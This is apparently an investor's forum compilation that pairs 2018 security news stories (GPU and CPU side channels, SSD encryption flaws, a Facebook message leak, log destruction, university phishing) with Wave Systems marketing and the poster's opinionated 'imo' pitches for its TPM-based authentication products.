https://www.wavesys.com/malware-protection
Excerpt:
Software can’t always detect malware
The big problem with malware is that antivirus software doesn’t always detect it. Anti-malware software is based on signatures of known bad software. However, there always needs to be a patient 0 that discovers he is infected, for the rest of the world to benefit from it. In the case of APTs (Advanced Persistent Threats), your organization may be the only target for the specific strand of malware. In that case, the signature detection process will not protect you. Modern anti-malware and other software packages that promise cyber security or protection from APTs would use various heuristics and "AI" (Artificial Intelligence) to detect malware based on a predefined set of behavioral parameters. A sophisticated attacker is able to fine tune the behavior of the malware he is writing against various known anti-malware software solutions, so that it can evade detection for long periods of time.
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
GPU side channel attacks can enable spying on web activity, password stealing
https://www.helpnetsecurity.com/2018/11/06/gpu-side-channel-attacks/
Computer scientists at the University of California, Riverside have revealed for the first time how easily attackers can use a computer’s graphics processing unit, or GPU, to spy on web activity, steal passwords, and break into cloud-based applications.
Marlan and Rosemary Bourns College of Engineering computer science doctoral student Hoda Naghibijouybari and post-doctoral researcher Ajaya Neupane, along with Associate Professor Zhiyun Qian and Professor Nael Abu-Ghazaleh, reverse engineered a Nvidia GPU to demonstrate three attacks on both graphics and computational stacks, as well as across them.
All three attacks require the victim to first acquire a malicious program embedded in a downloaded app. The program is designed to spy on the victim’s computer.
Web browsers use GPUs to render graphics on desktops, laptops, and smart phones. GPUs are also used to accelerate applications on the cloud and data centers. Web graphics can expose user information and activity. Computational workloads enhanced by the GPU include applications with sensitive data or algorithms that might be exposed by the new attacks.
GPUs are usually programmed using application programming interfaces, or APIs, such as OpenGL. OpenGL is accessible by any application on a desktop with user-level privileges, making all attacks practical on a desktop. Since desktop or laptop machines by default come with the graphics libraries and drivers installed, the attack can be implemented easily using graphics APIs.
The first attack tracks user activity on the web. When the victim opens the malicious app, it uses OpenGL to create a spy to infer the behavior of the browser as it uses the GPU. Every website has a unique trace in terms of GPU memory utilization due to the different number of objects and different sizes of objects being rendered. This signal is consistent across loading the same website several times and is unaffected by caching.
The researchers monitored either GPU memory allocations over time or GPU performance counters and fed these features to a machine learning based classifier, achieving website fingerprinting with high accuracy. The spy can reliably obtain all allocation events to see what the user has been doing on the web.
In the second attack, the authors extracted user passwords. Each time the user types a character, the whole password textbox is uploaded to GPU as a texture to be rendered. Monitoring the interval time of consecutive memory allocation events leaked the number of password characters and inter-keystroke timing, well-established techniques for learning passwords.
The third attack targets a computational application in the cloud. The attacker launches a malicious computational workload on the GPU which operates alongside the victim’s application. Depending on neural network parameters, the intensity and pattern of contention on the cache, memory and functional units differ over time, creating measurable leakage. The attacker uses machine learning-based classification on performance counter traces to extract the victim’s secret neural network structure, such as number of neurons in a specific layer of a deep neural network.
The researchers reported their findings to Nvidia, who responded that they intend to publish a patch that offers system administrators the option to disable access to performance counters from user-level processes. They also shared a draft of the paper with the AMD and Intel security teams to enable them to evaluate their GPUs with respect to such vulnerabilities.
In the future the group plans to test the feasibility of GPU side channel attacks on Android phones.
=================================================================
Why wait for Nvidia, Intel and AMD for a patch for this potentially severe problem? A proactive approach would be to use Wave VSC 2.0 and store the PIN number in the TPM to avoid any potential pitfalls. In Wave VSC 2.0, the user can forget about any passwords (credentials) because they are secured in the TPM and not accessible by a threat such as the one in this article. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Flaws in Popular SSD Drives Bypass Hardware Disk Encryption
https://www.bleepingcomputer.com/news/security/flaws-in-popular-ssd-drives-bypass-hardware-disk-encryption/
Researchers have found flaws that can be exploited to bypass hardware decryption without a password in well known and popular SSD drives.
In a new report titled "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)", researchers Carlo Meijer and Bernard van Gastel from Radboud University explain how they were able to to modify the firmware or use a debugging interface to modify the password validation routine in SSD drives to decrypt hardware encrypted data without a password.
The researchers tested these methods against well known and popular SSD drives such as the Crucial MX100, Crucial MX200, Crucial MX300, Samsung 840 EVO, Samsung 850 EVO, Samsung T3 Portable, and Samsung T5 Portable and were able to illustrate methods to access the encrypted drive's data.
"We have analyzed the hardware full-disk encryption of several SSDs by reverse engineering their firmware," stated the report. "In theory, the security guarantees offered by hardware encryption are similar to or better than software implementations. In reality, we found that many hardware implementations have critical security weaknesses, for many models allowing for complete recovery of the data without knowledge of any secret."
To make matters worse, as Windows' BitLocker software encryption will default to hard drive encryption if supported, it can be bypassed using the same discovered flaws.
Accessing encrypted files without knowing the password
To bypass decryption passwords, the researchers utilized a variety of techniques depending on whether debug ports were available, the ATA Security self-encrypting drive (SED) standard was being used, or if the newer TCG Opal SED specification was being used.
These flaws were responsibly disclosed to Crucial and Samsung to give them time to prepare firmware updates. New firmware is availble for Crucial SSD drives, while Samsung has only released new firmware for their T3 and T5 Portable SSD drives. For their non-portable drives (EVO), they recommend that users utilize software encryption instead.
Crucial MX 100, Crucial MX 200, & Samsung T3 Portable
For the Crucial MX 100, Crucial MX 200, and Samsung T3 Portable SSD drives, the researchers were able to connect to the drive's JTAG debugging interfaces and modify the password validation routine so that it always validates as successful regardless of the password that is entered. This allows them to enter any password and have the drive unlocked.
Crucial MX300 SSD Drive
The Crucial MX300 also has a JTAG debugging port, but it is disabled on the drive.
Therefore, the researchers had to rely on a more complicated routine of flashing the device with a modified firmware that allows them to perform various routines, which ultimately allow them to either decrypt the password or authenticate to the device using an empty password.
Samsung 840 EVO and Samsung 850 EVO SSD Drives
Depending on which SED specification is used, the researchers were able to access the encrypted data by either connecting to the JTAG debug port and modifying the password validation routine or by using a wear-level issue that allows that them to recover the cryptographic secrets needed to unlock the drive from a previous unlocked instance.
The Samsung 850 EVO does not have the wear-level issue, so would need to rely on the modification of the password-validation routine through the debug port.
BitLocker fails by defaulting to hardware encryption
Most modern operating systems provide software encryption that allows a user to perform whole disk encryption. While software decryption offered by Linux, macOS, Android, and iOS offer strong software encryption, BitLocker on Windows falls prey to the SSD flaw by defaulting to hardware encryption when available.
When using BitLocker to encrypt a disk in Windows, if the operating system detects a SSD drive with hardware encryption, it will automatically default to using it. This allows drives encrypted by BitLocker using hardware encryption to be decrypted by the same flaws discussed above. BitLocker software encryption is secure as expected.
In order to prevent the use of SSD hardware encryption, the researchers suggest that users disable its use using a Windows Group Policy at "Computer Configuration\Administrative Templates\Windows Components\BitLocker Drive Encryption\Operating System Drives" called "Configure use of hardware-based encryption for operating system drives".
This policy is also available for removable and fixed data drives and should be disabled for them as well to enforce software encryption.
=================================================================
If Wave VSC 2.0 was used on a SED, these JTAG debugging interfaces may not come into play due to the TPM storing the first (PIN number) and second factors of authentication. It would bring a company's cybersecurity level up. imo. There are probably a lot of SEDs that could use Wave VSC 2.0 along with the rest of a company's computer fleet! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Private messages from 81,000 hacked Facebook accounts for sale
https://www.bbc.com/news/technology-46065796
Hackers appear to have compromised and published private messages from at least 81,000 Facebook users' accounts.
The perpetrators told the BBC Russian Service that they had details from a total of 120 million accounts, which they were attempting to sell, although there are reasons to be sceptical about that figure.
Facebook said its security had not been compromised.
And the data had probably been obtained through malicious browser extensions.
Facebook added it had taken steps to prevent further accounts being affected.
The BBC understands many of the users whose details have been compromised are based in Ukraine and Russia. However, some are from the UK, US, Brazil and elsewhere.
The hackers offered to sell access for 10 cents (8p) per account. However, their advert has since been taken offline.
"We have contacted browser-makers to ensure that known malicious extensions are no longer available to download in their stores," said Facebook executive Guy Rosen.
"We have also contacted law enforcement and have worked with local authorities to remove the website that displayed information from Facebook accounts."
Intimate correspondence
The breach first came to light in September, when a post from a user nicknamed FBSaler appeared on an English-language internet forum.
"We sell personal information of Facebook users. Our database includes 120 million accounts," the user wrote.
?Facebook fined £500,000 for Cambridge Analytica scandal
?Facebook hack victims will not get ID theft protection
?Is Facebook's News Feed fading?
The cyber-security company Digital Shadows examined the claim on behalf of the BBC and confirmed that more than 81,000 of the profiles posted online as a sample contained private messages.
Data from a further 176,000 accounts was also made available, although some of the information - including email addresses and phone numbers - could have been scraped from members who had not hidden it.
The BBC Russian Service contacted five Russian Facebook users whose private messages had been uploaded and confirmed the posts were theirs.
One example included photographs of a recent holiday, another was a chat about a recent Depeche Mode concert, and a third included complaints about a son-in-law.
There was also an intimate correspondence between two lovers.
One of the websites where the data had been published appeared to have been set up in St Petersburg.
Its IP address has also been flagged by the Cybercrime Tracker service. It says the address had been used to spread the LokiBot Trojan, which allows attackers to gain access to user passwords.
Presentational grey line
Who should be blamed?
Personal shopping assistants, bookmarking applications and even mini-puzzle games are all on offer from various browsers such as Chrome, Opera and Firefox as third-party extensions.
The little icons sit alongside your URL address bar patiently waiting for you to click on them.
According to Facebook, it was one such extension that quietly monitored victims' activity on the platform and sent personal details and private conversations back to the hackers.
Facebook has not named the extensions it believes were involved but says the leak was not its fault.
Independent cyber-experts have told the BBC that if rogue extensions were indeed the cause, the browsers' developers might share some responsibility for failing to vet the programs, assuming they were distributed via their marketplaces.
But the hack is still bad news for Facebook.
The embattled network has had a terrible year for data security and questions will be asked about whether it is proactive enough in responding to situations like this that affect large numbers of people.
The BBC Russian Service emailed the address listed alongside the hacked details, posing as a buyer interested in buying two million accounts' details.
The advertiser was asked whether the breached accounts were the same as those involved in either the Cambridge Analytica scandal or the subsequent security breach revealed in September.
A reply in English came from someone calling themself John Smith.
He said that the information had nothing to do with either data leak.
He claimed that his hacking group could offer data from 120 million users, of whom 2.7 million were Russians.
But Digital Shadows told the BBC that this claim was doubtful because it was unlikely Facebook would have missed such a large breach.
John Smith did not explain why he had not advertised his services more widely.
And when asked whether the leaks were linked to the Russian state or to the Internet Research Agency - a group of hackers linked to the Kremlin - he replied: "No."
=================================================================
Scrambls Introduces Secure Personal Sharing Across Social Networks & Websites
Users Regain Control over Personal Content when Posting Online
https://www.wavesys.com/buzz/pr/scrambls-introduces-secure-personal-sharing-across-social-networks-websites
Palo Alto, CA -
May 2, 2012 -
Today, scrambls launched as a free service empowering users to control and protect the messages they post to the web. Scrambls works on all of the most popular social media sites by means of a simple, yet secure web browser plug-in. It gives everyone the ability to share private communications online, and establishes personal control of every tweet, blog post or status update.
To scrambl messages, you simply enable scrambls in your browser to encode part or all of a message before it’s instantly uploaded to your favorite social media site. The cloud gets only scrambld content. You select the individuals or groups that can see the message in clear text on their devices. Friends just need to add scrambls to their own browser and messages will look the same as usual for them. Anyone else that was not approved to read the post will see only scrambld text.
“Greater control enables greater use of social media,” said Michael Sprague, scrambls co-creator. “Post confidently, knowing your boss won’t see messages meant for high school friends, and permanent records of what you say online won’t come back to haunt you in the future.”
Scrambls makes sharing content simple, safe and fun, while establishing lasting control for everything written and shared online. When entering status updates, tweets, blog posts and more, scrambls empowers you not only with the ability to choose who can see your postings—but also when messages appear, for how long and much more. And if you post something and then change your mind, you can even take it back simply by changing the groups or individuals permitted to read that post. Scrambld messages truly remain private because online services can’t read or scan the data of every post.
Scrambls helps users safeguard their privacy while protecting the huge investment in time and personal effort that goes into building a social reputation, so it’s possible to have older posts remain on a social media site, but altered to be only accessible by your family or close friends.
Get Started with Scrambls
Anyone can start using scrambls today by downloading the plug-in from www.scrambls.com, and choosing the version that works with your preferred web browser. Once installed, a switch will appear in your browser, allowing you to choose the individuals or groups that can read your posts—just select the group from a drop-down list. Then type as you usually would in any website, and the content is automatically scrambld on your device before it is uploaded to the site you are on.
To see what scrambld messages look like, view the short startup video here.
Social media providers can augment the privacy and security of their services with scrambls, and application developers can build scrambls into their own solutions as well. Along with the launch of the service, scrambls is releasing a software developer kit (SDK) to enable third-party apps and sites to integrate scrambls. Businesses can leverage the SDK to incorporate scrambls into their existing corporate policy services.
About Scrambls
Scrambls is a service developed by Wave Systems Corp. (NASDAQ: WAVX) that makes online sharing simple and safe. All you need is the scrambls plug-in added to your browser toolbar. You can make any post private with just one click, even if you’re publishing to different groups of contacts spread across multiple social networks. Scrambls lets you decide what the privacy policy will be for each post that you share. Scrambls makes online sharing smarter, with control over what you are sharing and whom you are sharing it with.
PortSmash attack punches hole in Intel's Hyper-Thread CPUs, leaves with crypto keys
https://www.theregister.co.uk/2018/11/02/portsmash_intel_security_attack/
Malware already on machines can exploit SMT with side-channel techniques to snatch secrets
Brainiacs in Cuba and Finland have found a new side-channel vulnerability in Intel x64 processors that could allow an attacker to sniff out cryptographic keys and other privileged information.
Following disclosure of the flaw to Intel at the beginning of October, boffins from the Tampere University of Technology in Finland and Technical University of Havana, Cuba, today published proof-of-concept they're calling PortSmash.
The research team used the PoC to steal an OpenSSL (version 1.1.0h or less) P-384 private key from a TLS server. (Subsequent versions of OpenSSL aren't susceptible.)
To pull off this secret surveillance, the exploit code must run on the system under attack, specifically on the same CPU core as the process you want to pry into. That means it can't be used to eavesdrop on software remotely, or easily on the same host, but it could be useful for determined miscreants and snoops who have managed to infiltrate someone else's computer. You basically have to already be able to run your own evil code on a machine in order to PortSmash it.
In a post to a security mailing list, Bill Brumley, assistant professor in the department of pervasive computing at Tampere University of Technology, said the information leakage was made possible thanks to Intel's implementation of simultaneous multi-threading, known as Hyper-Threading.
SMT works by allowing, typically, two separate running programs to share the same CPU core at more or less the same time: two threads in two independent processes can run alongside each other in a single processor core. If you have four cores, and two of these SMT hardware threads per core, then that's effectively eight cores per processor as far as application software is concerned, which means more stuff can be executed per second. SMT therefore boosts performance, but in some cases, can reduce performance depending on the workload type.
The downside is that it is possible for code in one hardware thread to look over the shoulder of code in the other hardware thread, on the same core, and work out what its partner is doing. It can do this by studying patterns of access to caches, or timing how long it takes to complete an operation. This is why developers of cryptography software are encouraged to build in defenses to thwart side-channel eavesdropping.
"We detect port contention to construct a timing side channel to exfiltrate information from processes running in parallel on the same physical core," as Brumley put it.
Thus, the attack works by running the PortSmash process alongside a selected victim process, on the same CPU core, with each process using one of the core's two SMT hardware threads. The PortSmash code then measures timing discrepancies to snoop on the operations performed by the other process, and gradually discern its protected data.
That means if the spied-upon process is performing some kind of cryptography, it is possible for the PortSmash process sharing the same CPU core to extract secret information, such as an decryption key, from its victim program
The fix, Brumley suggests, is to disable SMT/Hyper-Threading in the processor chip's BIOS. OpenBSD already disables Intel's Hyper-Threading for security reasons.
The PoC, Brumley says, works out of the box for Intel's Skylake and Kaby Lake, though it hasn't been tested on other Intel chips. He suggests it may work for other SMT architectures – such as AMD's Zen CPU family – if modifications are made to the code.
A CVE has been proposed, CVE-2018-5407, however, Intel doesn't appear to think it's worthy of a patch. For one thing, it has nothing to do with this year's speculative execution flaws: Spectre, Meltdown, and the like.
In a statement emailed to The Register, an Intel spokesperson suggested any risk can be mitigated through existing software protections, such as writing code that is resistant to SMT side-channel attacks. Chipzilla is, essentially, taking a line suggested in the mailing list discussion of the flaw that this isn't so much a vulnerability as "a fully expected by-design property" arising from SMT.
"Intel received notice of the research," the chipmaker's spokesperson said. "This issue is not reliant on speculative execution, and is therefore unrelated to Spectre, Meltdown or L1 Terminal Fault. We expect that it is not unique to Intel platforms. Research on side-channel analysis methods often focuses on manipulating and measuring the characteristics, such as timing, of shared hardware resources. Software or software libraries can be protected against such issues by employing side-channel safe development practices."
Intel's spokesperson repeated its assertion that the company takes protecting customer data seriously and considers it a top priority.
A spokesperson for AMD told us they're looking into it: "At AMD, security is a top priority and we are continually working to ensure the safety of our users as new risks arise. We are investigating the PortSmash side-channel vulnerability report, which we just received, to understand any potential AMD product susceptibility."
==================================================================
Intel CPUs impacted by new PortSmash side-channel vulnerability
https://www.zdnet.com/article/intel-cpus-impacted-by-new-portsmash-side-channel-vulnerability/
=================================================================
Why not store the cryptographic keys in the TPM and avoid a patching problem with Intel chips (and possibly AMD chips) altogether? The computer could then be protected by an enabled Bitlocker or an SED.
=================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Hackers are increasingly destroying logs to hide attacks
https://www.zdnet.com/article/hackers-are-increasingly-destroying-logs-to-hide-attacks/
According to a new report, 72 percent of incident response specialists have came across hacks where attackers have destroyed logs to hide their tracks.
Hacker groups are increasingly turning to log file destruction and other destructive methods as a means to hide their tracks, according to a report released this week and containing information from 113 investigations performed by 37 Carbon Black incident response (IR) affiliate partners from across the globe.
According to the report, "politically motivated cyberattacks from nation-state actors have contributed to an ominous increase in destructive attacks: attacks that are tailored to specific targets, cause system outages and destroy data in ways designed to paralyze an organization's operations."
Carbon Black said that hacker groups are getting better at what the company calls "counter-incident response."
They said that hackers attempted counter-incident response in 51 percent of all incidents the company and its partners investigated in the last 90 days.
"We've seen a lot of destruction of log data, very meticulous clean-up of antivirus logs, security logs, and denying IR teams the access to data they need to investigate," an IR professional said.
In fact, according to the Carbon Black report, 72 percent of all its partner IR professionals saw counter-IR operations in the form of destruction of logs, which appears to have become a standard tactic in the arsenal of most hackers.
But in some cases, hackers took log destruction and other counter-incident response operations to a new level, and in some cases, their actions resulting in more lasting damage.
"Our respondents said victims experienced such attacks 32% of the time," Carbon Black said in its report.
"We've seen a lot of destructive actions from Iran and North Korea lately, where they've effectively wiped machines they suspect of being forensically analyzed," an IR professional said.
"Attackers want to cover their tracks because they're feeling the pressure from law enforcement," another IR professional said.
But Carbon Black also points out that the cyber-security industry, as a whole, has also gotten much better at incident response, hence attackers' increased focus on removing logs and even wiping systems, just to be on the safe side.
Other key findings:
The same Carbon Black report also touches on many other interesting topics, such as the use of legitimate tools for lateral movements inside compromised networks, the concept of "island hoping," and the increased focus on IoT devices as entry points into homes and companies. The summarized key findings are available below:
•China and Russia are responsible for nearly half of all cyberattacks. Of 113 investigations conducted by Carbon Black IR partners in the third quarter, 47 stemmed from those two countries alone, while Iran, North Korea, and Brazil were also the origin of a considerable amount of recent attacks.
•Half of today's attacks leverage "island hopping," whereby attackers target organizations with the intention of accessing an affiliate's network.
•An alarming 38 percent of IR professionals saw attacks on enterprise IoT devices, which can be a point of entry to organizations' primary networks, allowing island hopping.
•Around 54 percent of IR firms said they saw attacks on IoT consumer devices.
•Around 30 percent of respondents also saw victims' websites converted into a watering hole.
•An alarming 41 percent of respondents encountered instances where network-based protections were circumvented.
•Powershell was the primary tool used for lateral movements inside a network by attackers, found in 89 percent of incidents, followed by WMI (Windows Management Instrumentation).
•Around 27 percent of respondents chose a shortage of skilled security experts was the top barrier to incident response.
•The industry most frequently targeted by cyberattacks was the financial sector, followed by healthcare, retail, and manufacturing.
•Two-thirds of IR professionals believe cyberattacks will influence the upcoming US elections.
=================================================================
Incident response specialists wouldn't have to investigate/worry about logs (removed by the hacker) if their companies were using Wave ERAS and/or Wave VSC 2.0 since the hacker wouldn't be allowed on the network in the first place! This could save companies a lot of unproductivity and damage to their computer infrastructure as well as their reputation. Lateral movements inside the network could be prevented by Wave VSC 2.0 and the TPM!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
US senator working on bill that would jail CEOs for user privacy violations
https://www.zdnet.com/article/us-senator-working-on-bill-that-would-jail-ceos-for-user-privacy-violations/
Company execs could face up to 20 years in prison if they lie in privacy reports submitted to the FTC.
Oregon Democrat Senator Ron Wyden is working on a bill that would bolster US consumer privacy rights, bring them to the level of the EU General Data Protection Regulation (GDPR), and even take protections one step further by jailing executives at big companies for lying or not reporting privacy violations.
The new bill --named the Consumer Data Protection Act (CDPA)-- is only a draft for the time being, but Sen. Wyden has published a working version, asking for the public's feedback.
In its current state, the CDPA would grant the Federal Trade Commission new powers when enforcing consumer privacy rights.
For starters, the bill would establish minimum privacy and cybersecurity standards that companies would be forced to abide by or face the FTC's wrath. If companies fail, they risk GDPR-like fines of up to 4 percent of their total annual gross revenue.
Second, the CDPA would also mandate that large companies submit annual privacy reports with the FTC. Any company that manages the private data of more than 50 million users or has annual revenue of over $1 billion would have to do so, according to the CDPA.
Senior executives at these large companies, such as Chief Executive Officers, Chief Privacy Officers, or Chief Information Security Officers would personally vouch for these reports.
The reports would have to detail if and how the company complied with the CDPA's new privacy rules. If execs lie or fail to disclose privacy breaches in these reports, they could face up to 20 years in prison.
Among the new privacy protections mentioned in the current form of the CDPA, Sen. Wyden proposes that the FTC establish and enforce a "Do Not Track" system through which consumers are given a choice not to share their personal information with companies.
The CDPA also bans companies from blocking users from accessing their services if they decided not to share their personal data. Instead, the bill would allow companies to charge a user to access their sites or services with the equivalent of the user's data as an entrance fee.
Furthermore, taking a page out of GDPR's book, the CDPA would also allow users a way to review what personal information a company has collected about them and learn with whom it has been shared.
Last but not least, the bill would also create over 175 new jobs at the FTC for employees tasked with watching out for US consumers' privacy, but the bill would also require the FTC to create an API that developers can use to build apps, which, in turn, would help consumers "request, receive, and process information they are entitled to under this Act, and to manage their opt-out preferences."
=================================================================
Given the choice of using RSA Securid, other 2FA products or Wave VSC 2.0, CEOs may want to go with the better security (Wave VSC 2.0) or they may be spending time in prison in the future. imo.
=================================================================
Wave VSC 2.0 White Paper is at the link below and shows some weaknesses of RSA Securid and others:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
=================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
=================================================================
Global Professional Services Firm Renews Software Maintenance Agreement with Wave Systems
https://www.wavesys.com/buzz/pr/global-professional-services-firm-renews-software-maintenance-agreement-wave-systems
Global Professional Services Firm Renews Software Maintenance Agreement with Wave Systems
https://www.wavesys.com/buzz/pr/global-professional-services-firm-renews-software-maintenance-agreement-wave-systems
Lee, MA -
June 23, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announced that a global professional services firm has signed a one-year software maintenance renewal agreement for approximately $150,000 to use Wave’s TPM management software capabilities to secure their endpoint devices.
The customer utilizes Wave’s solution in conjunction with industry-standard Trusted Platform Module (TPM) security chips to deliver hardware-based secure authentication for over 100,000 employees worldwide.
“Wave provides a superior solution to secure access to critical corporate infrastructure. Our software allows an easy way to manage and access TPM cryptographic services best suited to the needs of clients with a diverse and distributed user population,” said Bill Solms, President and CEO, Wave Systems. “This agreement is an extension of their current contract with Wave. Their renewal and successful use of our software over the past several years validates that major global corporations continue to choose Wave’s solutions to protect their IT environments.”
=================================================================
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=144562943
=================================================================
The TPM has already been tested in real world conditions with this Professional Services Company (PWC - a UK based company) with over 100,000 seats. It appears that from this PR, the company has been well-protected with Wave's product and the TPM. With Wave Knowd (currently in retirement) and Wave VSC 2.0 many British companies could be better protected with Wave's authentication product(s). The difference being the time to implement the TPM turn on is shorter by using ERAS than the time PWC spent turning them on years ago. Given the success PWC has had with TPMs and Wave's product, it seems that there would be many companies in the UK if told about this PR would want to use a product like Wave's VSC 2.0.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Iranian Hackers Hit U.K. Cybersecurity Universities
https://www.forbes.com/sites/geoffwhite/2018/10/29/iranian-hackers-hit-u-k-cybersecurity-universities/#6e545fe331c9
Iranian cybercriminals tried to hack into U.K. universities offering government-certified cybersecurity courses, successfully accessing at least one university’s accounts during a campaign lasting months.
The hacking group has targeted at least 18 British universities, according to researchers. The list includes top-flight institutions. But it also includes less well-known destinations which are notable for being among a select group certified by the National Cyber Security Centre (NCSC) to provide degrees in cybersecurity.
It is not known whether the universities were singled out because of their affiliation, but half of those targeted by the hackers are on the NCSC-certified list, including Warwick and Lancaster. The attacks are believed to be linked to a previous campaign which US officials blamed on Iranians, in which dozens of universities were hacked and their research published on two Iranian websites.
People with U.K. university log-ins were sent phishing emails to trick them into giving up their passwords.
Lancaster University said a small number of recipients fell for the hackers’ attack and entered their credentials. The University reset their passwords and investigated whether any information had been lost.
“We were aware of the phishing campaign, which posed as a library notification and directed the user to the fake page,” a spokeswoman said. “The University blocked the link and all those targeted by the campaign were individually notified by the University.”
A Warwick University spokesman said its use of two-factor authentication would have prevented data theft. “There is no evidence of any data loss around sensitive or valuable research material at Warwick by [cyberattacks],” said a spokesman.
Students who take the certified cybersecurity degrees are not guaranteed a job with GCHQ or the National Cyber Security Centre, but will likely end up occupying senior positions protecting the UK’s largest companies and institutions from cyberattack.
The hackers sent their targets a fake email to trick them into logging in, thereby revealing their passwords. To make the emails look genuine the hackers created spoofed websites similar to the genuine universities’ sites.
The registration of the websites shows the hackers have been active in the last few months. A fake site for Warwick University, where cybersecurity masters courses are NCSC-certified, was set up in June. A fake Lancaster University site was created in May.
This is despite the US Department of Justice charging nine Iranians with hacks on universities in March, claiming the “Mabna Institute” group had stolen 31 terabytes of academic information universities in 22 countries. Since then, researchers have been painstakingly tracking the creation of new fake websites, seemingly by the same hacking group, which show the hacking attempts on universities have continued.
A spokesperson for the NCSC said: “Universities are a popular target for cyber actors seeking access to intellectual property, such as cutting-edge research. The NCSC supports the academic sector to help them to improve their security practices. This has included our Active Cyber Defence programme, which took down 23 attempts to spoof one university’s website. We urge universities to follow the best practice cybersecurity advice on the NCSC website.”
The hackers also used the internet’s “green padlock” system to try to fool victims into entering their passwords. Many web users believe the presence of a green padlock in their browser means the site is safe to visit. In fact, it means only that information sent to and from the site is encrypted; the site itself could be fake or malicious.
The hackers successfully gained green padlock certificates from a US company called Let’s Encrypt, meaning victims could have been tricked into thinking the sites were legitimate. Let’s Encrypt told Forbes: “Browsers are misleading people about site safety when they display lock icons. Some people incorrectly interpret lock icons as a sign that a site's content is safe or trustworthy, and that's a completely separate issue from whether or not the connection is secure. We would like to see browsers stop displaying lock icons on the basis of the existence of a secure connection.”
=================================================================
I have read that the UK was testing the TPM many months ago and with a 'Public' Wave Knowd the non-employees could have access to an authentication product that could protect them from hackers like Iranians. (Knowd is in retirement currently but was a very promising product) The UK 'Public' employees could have their authentication protected by Wave VSC 2.0. Wave has state of the art technology around authentication that could benefit employees/non-employees (students) with these two products which are easier to use than the standard (2FA) and is better security! There would be no need to fumble around with keys. And each product takes advantage of a standard (TPM) backed by 150 companies!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
=================================================================
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Lee, MA -
May 9, 2013 -
